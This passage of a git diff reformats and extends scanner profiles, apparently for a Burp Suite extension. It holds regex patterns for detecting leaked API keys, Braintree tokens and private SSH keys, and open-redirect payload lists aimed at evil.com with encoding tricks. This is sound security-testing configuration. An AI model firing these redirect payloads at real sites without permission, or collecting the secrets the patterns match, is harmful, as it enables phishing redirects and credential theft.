-[{"Name":"OAuth2","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["response_type","client_id","grant_type","redirect_uri","oauth","oidc"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OAuth2","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"OAuth2 Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "OAuth2",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,response_type",
+ "true,Or,All Request,Value,client_id",
+ "true,Or,All Request,Value,grant_type",
+ "true,Or,All Request,Value,redirect_uri",
+ "true,Or,All Request,Value,oauth",
+ "true,Or,All Request,Value,oidc"
+ ],
+ "Tags": [
+ "JWT",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "OAuth2",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "OAuth2 Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/OAuth2response.bb b/profiles/OAuth2response.bb
new file mode 100755
index 0000000..85b5c4c
--- /dev/null
+++ b/profiles/OAuth2response.bb
@@ -0,0 +1,64 @@
+[
+ {
+ "ProfileName": "OAuth2response",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,response_type",
+ "true,Or,client_id",
+ "true,Or,grant_type",
+ "true,Or,redirect_uri",
+ "true,Or,oauth",
+ "true,Or,oidc"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "OAuth2",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "OAuth2 Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Octopus_API_Key.bb b/profiles/Octopus_API_Key.bb
old mode 100644
new mode 100755
index 6b0aca2..ee618c5
--- a/profiles/Octopus_API_Key.bb
+++ b/profiles/Octopus_API_Key.bb
@@ -1 +1,59 @@
-[{"Name":"Octopus_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,X-Octopus-ApiKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"X-Octopus-ApiKey","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Octopus_API_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,X-Octopus-ApiKey"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-Octopus-ApiKey",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/OpenRedirect-ParameterPollution.bb b/profiles/OpenRedirect-ParameterPollution.bb
index 872f8e6..1696d22 100755
--- a/profiles/OpenRedirect-ParameterPollution.bb
+++ b/profiles/OpenRedirect-ParameterPollution.bb
@@ -1 +1,129 @@
-[{"Name":"OpenRedirect-ParameterPollution","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/{payload}","?next\u003d{payload}","?url\u003d{payload}","?target\u003d{payload}","?rurl\u003d{payload}","?dest\u003d{payload}","?destination\u003d{payload}","?redir\u003d{payload}","?redirect_uri\u003d{payload}","?redirect\u003d{payload}","/redirect/{payload}","/cgi-bin/redirect.cgi?{payload}","/out/{payload}","/out?{payload}","?view\u003d{payload}","/login?to\u003d{payload}","?image_url\u003d{payload}","?go\u003d{payload}","?return\u003d{payload}","?returnTo\u003d{payload}","?return_to\u003d{payload}","?checkout_url\u003d{payload}","?continue\u003d{payload}","?return_path\u003d{payload}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,-Token1337-"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect-ParameterPollution","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{payload}","replace":"http://www.wagiro.com/test-open-redirect","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "OpenRedirect-ParameterPollution",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/{payload}",
+ "true,?next\u003d{payload}",
+ "true,?url\u003d{payload}",
+ "true,?target\u003d{payload}",
+ "true,?rurl\u003d{payload}",
+ "true,?dest\u003d{payload}",
+ "true,?destination\u003d{payload}",
+ "true,?redir\u003d{payload}",
+ "true,?redirect_uri\u003d{payload}",
+ "true,?redirect\u003d{payload}",
+ "true,/redirect/{payload}",
+ "true,/cgi-bin/redirect.cgi?{payload}",
+ "true,/out/{payload}",
+ "true,/out?{payload}",
+ "true,?view\u003d{payload}",
+ "true,/login?to\u003d{payload}",
+ "true,?image_url\u003d{payload}",
+ "true,?go\u003d{payload}",
+ "true,?return\u003d{payload}",
+ "true,?returnTo\u003d{payload}",
+ "true,?return_to\u003d{payload}",
+ "true,?checkout_url\u003d{payload}",
+ "true,?continue\u003d{payload}",
+ "true,?return_path\u003d{payload}"
+ ],
+ "Encoder": [
+ " "
+ ],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,-Token1337-"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 9,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "OpenRedirect-ParameterPollution",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{payload}",
+ "replace": "http://www.wagiro.com/test-open-redirect",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/OpenRedirect.bb b/profiles/OpenRedirect.bb
index 220242d..ba8e5d3 100755
--- a/profiles/OpenRedirect.bb
+++ b/profiles/OpenRedirect.bb
@@ -1 +1,113 @@
-[{"Name":"OpenRedirect","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%2F%09%2Fevil.com","%2F%10%2Fevil.com","%2F%13%2Fevil.com","evil.com","/evil.com","//evil.com","///evil.com","////evil.com","/\\evil.com","%2fevil.com","%2f$2fevil.com","%2fevil.com%2f%2f","$2f%2fevil.com%2f%2f","%2fevil.com//","http://example.com%0a%23.evil.com"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,location.*evil.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "OpenRedirect",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,%2F%09%2Fevil.com",
+ "true,%2F%10%2Fevil.com",
+ "true,%2F%13%2Fevil.com",
+ "true,evil.com",
+ "true,/evil.com",
+ "true,//evil.com",
+ "true,///evil.com",
+ "true,////evil.com",
+ "true,/\\evil.com",
+ "true,%2fevil.com",
+ "true,%2f$2fevil.com",
+ "true,%2fevil.com%2f%2f",
+ "true,$2f%2fevil.com%2f%2f",
+ "true,%2fevil.com//",
+ "true,http://example.com%0a%23.evil.com"
+ ],
+ "Encoder": [
+ " "
+ ],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,location.*evil.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 9,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "OpenRedirect",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/OpenRedirectActive.bb b/profiles/OpenRedirectActive.bb
index 5af1096..196c5b0 100755
--- a/profiles/OpenRedirectActive.bb
+++ b/profiles/OpenRedirectActive.bb
@@ -1 +1,72 @@
-[{"Name":"OpenRedirectActive","Enabled":true,"Scanner":1,"Author":"@GochaOqradze","Payloads":["redirectx"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,\u003cmeta http-equiv\u003d\"refresh\".*redirectx\" /\u003e","true,Or,window\\.location.*redirectx","true,Or,Location:.*redirectx"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"","IssueSeverity":"","IssueConfidence":"","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65,36,1,6,5,64,0,3],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "OpenRedirectActive",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@GochaOqradze",
+ "Payloads": [
+ "true,redirectx"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,\u003cmeta http-equiv\u003d\"refresh\".*redirectx\" /\u003e",
+ "true,Or,window\\.location.*redirectx",
+ "true,Or,Location:.*redirectx"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "",
+ "IssueSeverity": "",
+ "IssueConfidence": "",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65,
+ 36,
+ 1,
+ 6,
+ 5,
+ 64,
+ 0,
+ 3
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Outlook_Team.bb b/profiles/Outlook_Team.bb
old mode 100644
new mode 100755
index 226e6ba..e8bd26b
--- a/profiles/Outlook_Team.bb
+++ b/profiles/Outlook_Team.bb
@@ -1 +1,59 @@
-[{"Name":"Outlook_Team","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(https\\\\:\\/\\/outlook\\\\.office.com\\/webhook\\/[0-9a-f-]{36}\\\\@)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Outlook Team","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Outlook_Team",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(https\\\\:\\/\\/outlook\\\\.office.com\\/webhook\\/[0-9a-f-]{36}\\\\@)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Outlook Team",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Paypal_Braintree_access_token.bb b/profiles/Paypal_Braintree_access_token.bb
old mode 100644
new mode 100755
index 810af32..052b665
--- a/profiles/Paypal_Braintree_access_token.bb
+++ b/profiles/Paypal_Braintree_access_token.bb
@@ -1 +1,59 @@
-[{"Name":"Paypal_Braintree_access_token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Paypal Braintree access token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Paypal_Braintree_access_token",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Paypal Braintree access token",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Picatic_API_Key.bb b/profiles/Picatic_API_Key.bb
old mode 100644
new mode 100755
index b46fa02..5b1c8b0
--- a/profiles/Picatic_API_Key.bb
+++ b/profiles/Picatic_API_Key.bb
@@ -1 +1,59 @@
-[{"Name":"Picatic_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,sk_live_[0-9a-z]{32}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Picatic API Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Picatic_API_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,sk_live_[0-9a-z]{32}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Picatic API Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Private_SSH_Key.bb b/profiles/Private_SSH_Key.bb
old mode 100644
new mode 100755
index 64ca1fa..6deb07a
--- a/profiles/Private_SSH_Key.bb
+++ b/profiles/Private_SSH_Key.bb
@@ -1 +1,59 @@
-[{"Name":"Private_SSH_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,([-]+BEGIN [^\\s]+ PRIVATE KEY[-])"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Private SSH Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Private_SSH_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,([-]+BEGIN [^\\s]+ PRIVATE KEY[-])"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
